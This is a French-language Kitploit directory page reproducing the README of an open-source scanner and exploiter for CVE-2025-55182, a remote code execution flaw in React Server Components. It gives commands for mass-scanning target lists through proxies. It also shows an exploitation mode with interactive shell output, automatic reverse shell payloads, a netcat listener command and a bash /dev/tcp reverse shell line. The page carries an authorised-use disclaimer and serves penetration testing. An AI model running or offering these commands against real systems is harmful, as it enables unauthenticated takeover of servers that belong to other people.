Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182 — Scanner de vulnérabilité RCE critique pour React Server Components (CVE-2025-55182). Framework d'exploitation automatisé avec prise en charge multi-payload, capacités de proxy et exécution interactive de commandes. | Kitploit
Outils/GitHubGitHub/alihzsec/cve-2025-55182
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Scanner de vulnérabilité RCE critique pour React Server Components (CVE-2025-55182). Framework d'exploitation automatisé avec prise en charge multi-payload, capacités de proxy et exécution interactive de commandes.

Voir le dépôt
1513il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 Scanneur et Exploiteur

[!Warning] Ce dépôt est destiné uniquement à des fins éducatives et de recherche.

  • Utilisez les PoCs fournis exclusivement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.
  • L'accès non autorisé, l'exploitation ou l'utilisation abusive de tout matériel dans ce dépôt est illégal.
  • L'(es) auteur(s) n'assume(nt) aucune responsabilité pour tout dommage, utilisation abusive ou conséquences juridiques résultant d'une utilisation inappropriée.

🔍 Aperçu

CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance affectant les versions 19.0.0, 19.1.0, 19.1.1 et 19.2.0 de React Server Components. Cette vulnérabilité provient d'une désérialisation non sécurisée des charges utiles des requêtes HTTP vers les points de terminaison des fonctions serveur, permettant à des attaquants non authentifiés d'exécuter du code arbitraire à distance.


🐛 Détails de la vulnérabilité

CVE ID : CVE-2025-55182
Versions affectées :

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Installation

Prérequis

  • Python 3.8 ou supérieur
  • pip (gestionnaire de paquets Python)

Configuration

  1. Clonez le dépôt
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Créez un environnement virtuel (recommandé)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. Installez les dépendances
root@kitploit:~
pip install -r requirements.txt

📖 Utilisation

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Arguments

Arguments

ArgumentDescription
-d, --detectionMode détection (recherche de vulnérabilités)
-e, --exploitMode exploitation (exploiter une cible unique)
-u, --url URLURL cible unique à analyser/exploiter
-l, --list FILEFichier contenant une liste d'URL cibles (mode détection uniquement)
-p, --proxy URLURL proxy unique (ex. http://127.0.0.1:8080)
-pl, --proxy-list FILEFichier contenant une liste d'URL proxy (une par ligne)
-t, --threads NNombre de threads concurrents (défaut : 10, mode détection uniquement)
-s, --silentMode silencieux - n'affiche que les cibles vulnérables (mode détection uniquement)
-o, --output [FILE]Enregistrer les cibles vulnérables dans un fichier (mode détection uniquement). Si aucun nom de fichier n'est fourni, utilise par défaut : CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugActiver les logs de débogage - affiche les détails des réponses et les tentatives de nouvelle tentative (non disponible en mode silencieux)

🎯 Mode Détection

Analyser une cible unique

root@kitploit:~
python3 main.py -d -u https://example.com

Analyser plusieurs cibles depuis un fichier

root@kitploit:~
python3 main.py -d -l targets.txt

Analyser avec un proxy

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Mode Silencieux (Afficher uniquement les cibles vulnérables)

root@kitploit:~
python3 main.py -d -l targets.txt -s

Analyse multi-thread

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 Mode Exploitation

Shell interactif

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Sélectionnez ensuite [i] pour le shell interactif :

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

Shell inverse

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Sélectionnez ensuite [r] pour le shell inverse et choisissez le type de charge utile :

Option 1 : Charges utiles par défaut (Recommandé)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

L'outil essaiera automatiquement plus de 17 charges utiles de shell inverse différentes jusqu'à ce que l'une d'elles réussisse.

Option 2 : Charge utile personnalisée

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Références

  • Avis de sécurité officiel React
  • Avis de sécurité Meta
  • Avis de sécurité Vercel
  • Avis de sécurité Next.js
  • Détails CVE

Si vous trouvez cet outil utile, pensez à lui donner une étoile ! ⭐
Fait avec ❤️ pour la communauté de la sécurité
Télécharger l’outil